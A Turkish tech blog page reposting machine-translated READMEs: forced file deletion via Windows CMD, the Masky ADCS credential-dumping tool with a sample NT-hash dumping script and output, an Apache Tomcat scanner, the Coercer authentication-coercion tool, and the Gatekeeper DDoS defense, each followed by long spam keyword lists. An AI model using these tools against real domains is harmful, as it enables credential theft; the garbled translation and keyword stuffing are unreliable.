İçeriğe geç
  • osint
  • Ana Sayfa
  • iPhone
  • Hakkımda
  • CMD KOMUT ISTEMCISI
  • Windows
  • iPhone
  • Bloglar
  • Bloglar
  • osint
  • Ana Sayfa
  • iPhone
  • Hakkımda
  • CMD KOMUT ISTEMCISI
  • Windows
  • iPhone
  • Bloglar
  • Bloglar

Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu

Teknoloji blogu! Türkiye'nin en büyük teknoloji blogu cybersecurityplus.code.blog üzerinden en güncel teknoloji blog, methodları öğren son dakika gelişmeler

Menü
Sosyal Bağlantılar
Ara

kit linux

Komut İstemcisini Kullanarak Bir Klasörü / Dosyayı Silmek

  • Bu yöntem ile sileceğiniz klasörler Geri Dönüşüm Kutusu‘na gitmeden direk olarak silineceği için gerekliyse yedek almayı unutmayın.
  • Klasörleri silmek için kullanabileceğiniz RD veya RMDIR komutları tamamen aynı işe yarar.
  • Dosyaları silmek için kullanabileceğiniz DEL veya ERASE komutları tamamen aynı işe yarar.
  • Bir klasörün silinmemekte ısrar etmesinin sebebi Sistem Klasörü olması olabilir ve bu tip bir klasörü silmek sisteminizin kararlılığını bozabilir. Bu yüzden ne olduğunu bilmediğiniz klasörleri silmeyin.

1- Yönetici haklarına sahip bir Komut İstemcisi veya WinRe konsolunu kullanarak bir Komut İstemcisi açın.

2- Alttaki komutlardan ihtiyacınız olanı (Kırmızı ile yazılan yere silmek istediğiniz klasörün/dosyanın tam adresi gelecek şekilde) yazın ve Enter’a Basın.

  • RD /S /Q “Klasörün tam adresi”
  • DEL /F /Q /A “Dosyanın tam adresi”

Örneğin Masüstündeki Nonpasaran klasörünü silmek istersem;

  • RD /S /Q “C:\Users\nonpasaran\Desktop\Nonpasaran.txt”

Nonpasaran isimli Metin Belgesi’ni silmek istersem;

  • DEL /F /Q /A “C:\Users\nonpasaran\Desktop\Nonpasaran.txt”

olacak.

Eğer silmek istediğiniz dosya ise uzantısını da doğru bir şekilde yazmanız gerekiyor. Bunun için herhangi bir Windows Gezgini penceresinde Düzenle/Klasör ve arama seçenekleri yolunu izleyin ve Bilinen dosya türleri için uzantıları gizle seçeneğindeki işareti kaldırın ve kaydedip çıkın.

3- Klasör/Dosya silinmiş olmalı. Silinmediyse adresi kontrol edin. (Klasöre Shift tuşunu basılı tutarken sağ tıklayarak Yol olarak kopyala demek kolaylık sağlayabilir) Silme işlemi tamamlandıktan sonra Komut İstemcisi’ni kapatın.

İşlemlerde kullandığımız komutların anlamları şunlar;

/F : DEL komutuna zorlama (Force) hakkı veriyor. Yani dosya/klasör sadece okunabilir olsa dahi silinmesini sağlıyor.
/Q : Sessiz (Quiet) modda silinmesini sağlıyor. Yani silinme işlemi sizden onay istemeden arka planda gerçekleşiyor.
/S : Alt klasörleri de sil. (Subfolders)
/A : Dosya/Klasörün Özniteliklerini işleme uygun hale getirmek için izin vermeyi sağlıyor. (Allow) Burada Öznitelikleri de açıklamak istiyorum;

R (Read Only) : Yanlızca okunabilir.
S (System) : Sistem 
H (Hidden) : Gizli
A (Archive) : Arşiv

Bu makelemde Komut İstemcisini Kullanarak Bir Klasörü / Dosyayı Silmek anlattım. Bir sonraki makalemimizde görüşmek üzere..
Sorularınızı iletişim bölümünden yazabilirsiniz.

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Masky, bir ADCS sayesinde etki alanı kullanıcılarının kimlik bilgilerini uzaktan boşaltmak için alternatif bir yol sağlayan bir python kitaplığıdır . PFX, NT karmaları ve TGT’yi daha geniş bir kapsamda kolayca toplamak için bu kitaplığın üzerine bir komut satırı aracı oluşturulmuştur.

Bu araç, herhangi bir yeni güvenlik açığından yararlanmaz ve LSASS işlem belleğini boşaltarak çalışmaz. Aslında, yalnızca meşru Windows ve Active Directory özelliklerinden yararlanır (belirteç kimliğine bürünme, kerberos aracılığıyla sertifika doğrulama ve PKINIT aracılığıyla NT karmaları alma). Uygulanan teknikleri ve Masky’nin nasıl çalıştığını detaylandırmak için bir blog yazısı yayınlandı.

Masky kaynak kodu büyük ölçüde harika Certify ve Certipy araçlarına dayanmaktadır. ADCS’ye karşı saldırgan istismar teknikleri ile ilgili araştırmalar için yazarlarına gerçekten teşekkür ederim (bkz. Teşekkürler bölümü ).

Kurulum

Masky python3 kitaplığı ve ilişkili CLI’si, genel PyPi deposu aracılığıyla aşağıdaki gibi kolayca kurulabilir:

pip install masky

Masky aracısı yürütülebilir dosyası zaten PyPi paketine dahil edilmiştir.

Ayrıca, aracıyı değiştirmeniz gerekirse, C# kodu içinde bulunan bir Visual Studio projesi aracılığıyla yeniden derlenebilir agent/Masky.sln. İnşa edilmesini gerektirecektir .NET Framework 4.

kullanım

Masky bir Python kütüphanesi olarak tasarlanmıştır. Ayrıca, pentest veya RedTeam aktiviteleri sırasında kullanımını kolaylaştırmak için üzerine bir komut satırı arayüzü oluşturuldu.

CA serverHer iki kullanım için de, önce bir ADCS aracılığıyla CA namedağıtılan a’nın FQDN’sini almanız gerekir . certipy findBu bilgiler, seçenek veya yerleşik Microsoft certutil.exearacı aracılığıyla kolayca alınabilir . UserHedeflenen CA’da varsayılan şablonun etkinleştirildiğinden emin olun .

RasAutoUyarı: Masky, mevcut hizmetin değiştirilmesi yoluyla her hedefe bir yürütülebilir dosya dağıtır . İlk değerinin otomatik olarak geri alınmasına rağmen, ImagePathMasky çalışma zamanı sırasında beklenmeyen bir hata temizleme aşamasını atlayabilir. Bu nedenle, böyle bir istenmeyen duruş durumunda orijinal değeri manuel olarak sıfırlamayı unutmayın.

Komut satırı

Aşağıdaki demo, 4 uzak sistemi hedefleyerek Masky’nin temel kullanımını göstermektedir. Yürütülmesi, sec.lab test etki alanından 3 farklı etki alanı kullanıcısının NT karmalarını, CCACHE ve PFX’lerini toplamaya izin verir.

Masky ayrıca bu tür araçlar tarafından yaygın olarak sağlanan seçenekleri de sağlar (iş parçacığı numarası, kimlik doğrulama modu, dosyalardan yüklenen hedefler vb.).

  __  __           _ |  \/  | __ _ ___| | ___   _ | |\/| |/ _` / __| |/ / | | | | |  | | (_| \__ \   <| |_| | |_|  |_|\__,_|___/_|\_\__,  |  v0.0.3                 |___/usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]             [targets ...]positional arguments:  targets               Targets in CIDR, hostname and IP formats are accepted, from a file or notoptions:  -h, --help            show this help message and exit  -v, --verbose         Enable debugging messages  -ts, --timestamps     Display timestamps for each log  -t THREADS, --threads THREADS                        Threadpool size (max 15)Authentication:  -d DOMAIN, --domain DOMAIN                        Domain name to authenticate to  -u USER, --user USER  Username to au   thenticate with  -p PASSWORD, --password PASSWORD                        Password to authenticate with  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.  -H HASHES, --hashes HASHES                        Hashes to authenticate with (LM:NT, :NT or :LM)Connection:  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter  -ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY                        Certificate Authority Name (SERVER\CA_NAME)Results:  -nh, --no-hash        Do not request NT hashes  -nt, --no-ccache      Do not save ccache files  -np, --no-pfx         Do not save pfx files  -o OUTPUT, --output OUTPUT                        Local path to a folder where Masky results will be stored (automatically creates the folde   r if it does not exit)

Python kitaplığı

Aşağıda, uzak bir hedeften çalışan etki alanı kullanıcı oturumlarının sırlarını toplamak için Masky kitaplığını kullanan basit bir komut dosyası verilmiştir.

from masky import Maskyfrom getpass import getpassdef dump_nt_hashes():    # Define the authentication parameters    ca = "srv-01.sec.lab\sec-SRV-01-CA"    dc_ip = "192.168.23.148"    domain = "sec.lab"    user = "askywalker"    password = getpass()    # Create a Masky instance with these credentials    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)    # Set a target and run Masky against it    target = "192.168.23.130"    rslts = m.run(target)    # Check if Masky succesfully hijacked at least a user session    # or if an unexpected error occured    if not rslts:        return False    # Loop on MaskyResult object to display hijacked users and to retreive their NT hashes    print(f"Results from hostname: {rslts.hostname}")    for user in rslts.users:        print(f"\t - {user.domain}\{user.n   ame} - {user.nt_hash}")    return Trueif __name__ == "__main__":    dump_nt_hashes()

Yürütülmesi aşağıdaki çıktıyı üretir.

$> python3 .\masky_demo.pyPassword:Results from hostname: SRV-01         - sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157         - sec\askywalker - 8928e0723012a8471c0084149c4e23b1         - sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

Masky’nin başarılı bir şekilde yürütülmesinden sonra nesnelerin MaskyResultslistesini içeren bir nesne döndürülür .User

Lütfen masky\lib\results.pybu iki sınıf tarafından sağlanan yöntemleri ve nitelikleri kontrol etmek için modüle bakın.

Teşekkür

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

ApacheTomcatScanner – Apache Tomcat Sunucu Güvenlik Açıklarını Taramak İçin Bir Python Komut Dosyası

Apache Tomcat sunucu güvenlik açıklarını taramak için bir python betiği.

Özellikler

  • Apache Tomcat sunucularını aramak için çok iş parçacıklı işçiler.
  • Çoklu hedef kaynak mümkün:
    • Bir hedef listesi olarak kullanmak için bir LDAP sorgusu aracılığıyla bir Windows etki alanından bilgisayarların listesini alma .
    • Hedefleri bir dosyadan satır satır okumak.
    • Seçenekten bireysel hedeflerin (IP/DNS/CIDR) okunması -tt/--target.
  • Test edilecek bağlantı noktalarının özel listesi.
  • /manager/htmlErişim ve varsayılan kimlik bilgileri için testler .
  • --list-cvesSeçenek ile her sürümün CVE’lerini listeleyin


Kurulum

Şimdi bu komutla pypi’den yükleyebilirsiniz:

sudo python3 -m pip install apachetomcatscanner

kullanım

$ ./ApacheTomcatScanner.py -hApache Tomcat Scanner v2.3.2 - by @podalirius_usage: ApacheTomcatScanner.py [-h] [-v] [--debug] [-C] [-T THREADS] [-s] [--only-http] [--only-https] [--no-check-certificate] [--xlsx XLSX] [--json JSON] [-PI PROXY_IP] [-PP PROXY_PORT] [-rt REQUEST_TIMEOUT] [-tf TARGETS_FILE]                              [-tt TARGET] [-tp TARGET_PORTS] [-ad AUTH_DOMAIN] [-ai AUTH_DC_IP] [-au AUTH_USER] [-ap AUTH_PASSWORD] [-ah AUTH_HASH]A python script to scan for Apache Tomcat server vulnerabilities.optional arguments:  -h, --help            show this help message and exit  -v, --verbose         Verbose mode. (default: False)  --debug               Debug mode, for huge verbosity. (default: False)  -C, --list-cves       List CVE ids affecting each version found. (default: False)  -T THREADS, --threads THREADS                        Number of threads (default: 5)  -s, --servers-only    If querying ActiveDirectory, only get servers and not all computer objects. (default: False)  --only-http           Scan only with HTTP scheme. (default: False, scanning with both HTTP and HTTPs)  --only-https          Scan only with HTTPs scheme. (default: False, scanning with both HTTP and HTTPs)  --no-check-certificate                        Do not check certificate. (default: False)  --xlsx XLSX           Export results to XLSX  --json JSON           Export results to JSON  -PI PROXY_IP, --proxy-ip PROXY_IP                        Proxy IP.  -PP PROXY_PORT, --proxy-port PROXY_PORT                        Proxy port  -rt REQUEST_TIMEOUT, --request-timeout REQUEST_TIMEOUT  -tf TARGETS_FILE, --targets-file TARGETS_FILE                        Path to file containing a line by line list of targets.  -tt TARGET, --target TARGET                        Target IP, FQDN or CIDR  -tp TARGET_PORTS, --target-ports TARGET_PORTS                        Target ports to scan top search for Apache Tomcat servers.  -ad AUTH_DOMAIN, --auth-domain AUTH_DOMAIN                        Windows domain to authenticate to.  -ai AUTH_DC_IP, --auth-dc-ip AUTH_DC_IP                        IP of the domain controller.  -au AUTH_USER, --auth-user AUTH_USER                        Username of the domain account.  -ap AUTH_PASSWORD, --auth-password AUTH_PASSWORD                        Password of the domain account.  -ah AUTH_HASH, --auth-hash AUTH_HASH                        LM:NT hashes to pass the hash for this user.

Örnek

Ayrıca, her sürümün CVE’lerini şu --list-cvesseçenekle listeleyebilirsiniz:

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Coercer – Bir Windows Sunucusunu 9 Yöntemle Rastgele Bir Makinede Kimlik Doğrulaması İçin Otomatik Olarak Zorlamak İçin Bir Python Komut Dosyası

Bir Windows sunucusunu 9 yöntemle rastgele bir makinede kimlik doğrulaması yapmaya otomatik olarak zorlamak için bir python betiği.


Özellikler

  • Uzak makinedeki açık SMB borularını otomatik olarak algılar.
  • Sunucuyu rastgele bir makinede kimlik doğrulaması yapmaya zorlamak için tüm savunmasız RPC işlevlerini tek tek çağırır.
  • Zorlanmış bir kimlik doğrulaması gerçekleştirmeden yalnızca savunmasız protokolleri ve dinleme işlevlerini --analyzelisteleyen ile modu analiz edin .
  • Bir dosyadan bir hedef listesine zorlama saldırısı gerçekleştirin.--targets-file
  • --webdav-hostve ile bir WebDAV hedefine zorlama--webdav-port

kullanım

$ ./Coercer.py -h                                                                                                         ______                                    / ____/___  ___  _____________  _____     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/    / /___/ /_/ /  __/ /  / /__/  __/ /      v1.6    \____/\____/\___/_/   \___/\___/_/       by @podalirius_usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]                  (-t TARGET | -f TARGETS_FILE) [--target-ip ip address]Automatic windows authentication coercer over various RPC calls.options:  -h, --help            show this help message and exit  -u USERNAME, --username USERNAME                        Username to authenticate to the endpoint.  -p PASSWORD, --password PASSWORD                        Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)  -d DOMAIN, --domain DOMAIN                        Windows domain name to authenticate to the endpoint.  --hashes [LMHASH]:NTHASH                        NT/LM hashes (LM hash can be empty)  --no-pass             Don't ask for password (useful for -k)  -v, --verbose         Verbose mode (default: False)  -a, --analyze         Analyze mode (default: Attack mode)  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the                        command line  --dc-ip ip address    IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter  -t TARGET, --target TARGET                        IP address or hostname of the target machine  -f TARGETS_FILE, --targets-file TARGETS_FILE                        IP address or hostname of the target machine  --target-ip ip address                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it  -l LISTENER, --listener LISTENER                        IP address or hostname of the listener machine  -wh WEBDAV_HOST, --webdav-host WEBDAV_HOST                        WebDAV IP of the server to authenticate to.  -wp WEBDAV_PORT, --webdav-port WEBDAV_PORT                        WebDAV port of the server to authenticate to.

Örnek çıktı

Saldırı modunda ( --analyzeseçeneksiz) aşağıdaki çıktıyı alırsınız:

Tüm RPC çağrılarından sonra, Responder’da çok sayıda kimlik doğrulaması alırsınız:

Katkı

Çekme istekleri kabul edilir. Başka özellikler eklemek istiyorsanız bir konu açmaktan çekinmeyin.

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Gatekeeper – İlk Açık Kaynak DDoS Koruma Sistemi

Gatekeeper, ilk açık kaynaklı DoS koruma sistemidir. Herhangi bir en yüksek bant genişliğine ölçeklendirilmek üzere tasarlanmıştır, böylece hem bugünün hem de yarının DoS saldırılarına dayanabilir. Gatekeeper’ın coğrafi olarak dağıtılmış mimarisine rağmen, gelen trafik üzerinde uygulanması gereken tüm kararları tanımlayan ağ politikası merkezileştirilmiştir. Bu merkezileştirilmiş politika, ağ operatörlerinin çok yüksek gecikme süresi (örneğin dağıtılmış veri tabanları) altında geçerli olmayacak dağıtılmış algoritmalardan yararlanmasına ve aynı anda birden çok çok vektörlü DoS saldırısıyla mücadele etmesine olanak tanır.

Gatekeeper’ın hedef kullanıcıları, kurumların, hizmet ve içerik sağlayıcıların, kurumsal ağların vb. ağ operatörleridir. Bireysel İnternet kullanıcıları tarafından kullanılması amaçlanmamıştır.

Daha fazla bilgi için Gatekeeper wiki’sine bakın .

Hugepages Yapılandırması Nasıl Kurulur

DPDK, büyük sayfaların kullanılmasını gerektirir; dev sayfaların montajına ilişkin talimatlar gereksinim belgelerinde mevcuttur . Birçok sistemde aşağıdaki büyük sayfalar kurulumu yeterlidir:

$ echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

Seçenek 1: Paketleri Alın

Gatekeeper için Debian paketleri projenin Yayınlar sayfasında mevcuttur.
Düzenlemek

Paketler indirildikten sonra aşağıdaki komutlarla yüklenebilirler:

$ tar -zxvf gatekeeper-ubuntu-18.04-packages.tar.gz$ cd gatekeeper-ubuntu-18.04-packages$ sudo dpkg -i libgkrte-*.deb \    libgkdpdk-dev_*_amd64.deb \    gatekeeper-dpdk_*_amd64.deb \    gatekeeper-dpdk-dev_*_amd64.deb \    gatekeeper-dpdk-igb-uio-dkms_*_amd64.deb \    gatekeeper-dpdk-rte-kni-dkms_*_amd64.deb \    gatekeeper-bird_*_amd64.deb \    gatekeeper_*_amd64.deb

Paket gatekeeper-dpdk-dev, paket kurulumu ve çekirdek yükseltmeleri sırasında ilgili çekirdek modüllerini oluşturan DKMS paketlerinin bir bağımlılığıdır.
Ağ Bağdaştırıcılarını Yapılandırma

Dosyayı düzenleyin /etc/gatekeeper/envvarsve DPDK’ya bağlanacak ağ bağdaştırıcılarının adlarını girin. Örneğin:

GATEKEEPER_INTERFACES="eth0 eth1"

Alternatif olarak, arabirimlerin PCI adresleri belirtilebilir:

GATEKEEPER_INTERFACES="0000:00:07.0 0000:00:08.0"

Aynı dosyada, isteğe bağlı olarak değişkende Çevresel Soyutlama Katmanı seçeneklerini ve .DPDK_ARGSGATEKEEPER_ARGS
nasıl çalıştırılır

Gatekeeper’ı başlatmak ve yeniden başlatmalarda otomatik olarak başlatılmasını sağlamak için aşağıdaki komutları çalıştırın.

$ sudo systemctl start gatekeeper$ sudo systemctl enable gatekeeper

Seçenek 2: Kaynak

Yükleme Bağımlılıklarından Derleme

Aşağıdaki yazılım bağımlılıklarını yükleyin:

$ sudo apt-get update$ sudo apt-get -y -q install git clang devscripts doxygen hugepages \build-essential linux-headers-`uname -r` libmnl0 libmnl-dev \libkmod2 libkmod-dev libnuma-dev libelf1 libelf-dev libc6-dev-i386 \autoconf flex bison libncurses5-dev libreadline-dev

Not: Derlemek ve çalıştırmak için hem libmnl0ve hem de gereklidir , ancak yalnızca yalnızca çalıştırmak için gereklidir . Derlemek ve çalıştırmak için hem ve hem de gereklidir , ancak yalnızca yalnızca çalıştırmak için gereklidir . en son DPDK’yı derlemek ve NUMA sistemlerini desteklemek için gereklidir. Paket , DPDK’yı ELF dosyalarından BPF programlarını okuma desteğiyle derlemek için gereklidir, ancak yalnızca onu çalıştırmak için gereklidir. Paket , klasördeki BPF programlarını derlemek için gereklidir . , , , ve paketleri BIRD içindir . Paket , Gatekeeper Debian paketleri oluşturmak için kullanılır .libmnl-devgatekeeperlibmnl0gatekeeperlibkmod2libkmod-devgatekeeperlibkmod2gatekeeperlibnuma-devlibelf-devlibelf1libc6-dev-i386bpf/autoconfflexbisonlibncurses5-devlibreadline-devdevscripts

DPDK’yı kullanmak için tüm çevresel gereksinimlere sahip olduğunuzdan emin olun .
Klon Deposu

Gatekeeper bağımlılıklarını içeren alt modüller dahil olmak üzere Gatekeeper deposunu klonlayın:

$ git clone --recursive http://github.com/AltraMayor/gatekeeper.git

Klon seçeneğini kullanmazsanız , bağımlılıkları içeren alt modülleri dizin --recursiveiçinden almanız gerekir :gatekeeper

$ git submodule init$ git submodule update

derlemek

Bu bölüm Gatekeeper’ın manuel olarak nasıl oluşturulacağını açıklar. Debian paketleri oluşturmak istiyorsanız, Paketler nasıl oluşturulur bölümüne bakın .

Dizindeyken gatekeeperkurulum komut dosyasını çalıştırın:

$ . setup.sh

Bu komut dosyası DPDK, LuaJIT ve BIRD’yi derler ve gerekli çekirdek modüllerini yükler. Ayrıca, arabirim adlarını ve ilgili PCI adreslerini dosyaya kaydeder, lua/if_map.luaböylece arabirim adları Gatekeeper yapılandırma dosyalarında kullanılabilir.

Ayrıca iki çevresel değişken belirler: RTE_SDKve RTE_TARGET. Derlemeden önce ayarlanmaları gerekir gatekeeper.

Kurulum komut dosyasını çalıştırdıktan sonra, çevresel değişkenleri kabuğunuzun tercihler dosyasına kaydetmek isteyebilirsiniz. Örneğin, Bash’de şunları yapabilirsiniz:

$ echo "export RTE_SDK=${RTE_SDK}" >> ${HOME}/.profile$ echo "export RTE_TARGET=${RTE_TARGET}" >> ${HOME}/.profile

Aksi takdirde, her giriş yaptığınızda bu çevresel değişkenleri yeniden ayarlamanız gerekecektir.

DPDK derlenip değişkenler ayarlandıktan gatekeepersonra derlenebilir:

$ make

Ağ Bağdaştırıcılarını Yapılandırma

Ağ bağdaştırıcılarının kullanılmadan önce gatekeeperDPDK’ya bağlanması gerekir. Bunun için scripti kullanabilirsiniz dependencies/dpdk/usertools/dpdk-devbind.py. Örneğin:

$ sudo dependencies/dpdk/usertools/dpdk-devbind.py --bind=uio_pci_generic enp131s0f0

enp131s0f0Bu komut, arabirimi sürücüye bağlar, uio_pci_genericböylece çerçeveler çekirdek yerine doğrudan DPDK’ya iletilebilir. Bu bağlamanın yukarıdaki adımlarda Gatekeeper ayarlandıktan sonra gerçekleşmesi gerektiğini unutmayın, böylece bağlı arabirim lua/if_map.lua.
Nasıl Çalıştırılır

Derlendikten gatekeeperve ortam doğru şekilde yapılandırıldıktan sonra şunu çalıştırın:

$ sudo build/gatekeeper [EAL OPTIONS] -- [GATEKEEPER OPTIONS]

Nerede [EAL OPTIONS]çift çizgiden önce belirtilir ve DPDK’nın Çevresel Soyutlama Katmanı için parametreleri temsil eder ve [GATEKEEPER OPTIONS]çift çizgiden sonra belirtilir ve Gatekeeper’a özgü seçenekleri temsil eder .

DPDK’daki cihaz ve bellek yapılandırması dahil olmak üzere sistemin erken yapılandırması stdout’a kaydedilecektir. Gatekeeper başlatıldığında, tüm bilgiler Gatekeeper günlüğüne gönderilir.
Paketler nasıl oluşturulur

Gatekeeper Debian paketleri aşağıdaki komutlarla oluşturulabilir. Depo kökünden çalıştırılmaları amaçlanmıştır ve git alt modüllerinin çekildiğini ve yukarıda belirtildiği gibi yapı bağımlılıklarının kurulduğunu varsayarlar. Gatekeeper ve alt modüller, paket oluşturma işlemi sırasında otomatik olarak derlenecektir.

$ tar --exclude-vcs -Jcvf ../gatekeeper_1.0.0.orig.tar.xz -C .. gatekeeper$ debuild -uc -us

Gatekeeper paketi üst dizinde mevcut olacaktır.

Gatekeeper’ı İndir

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, 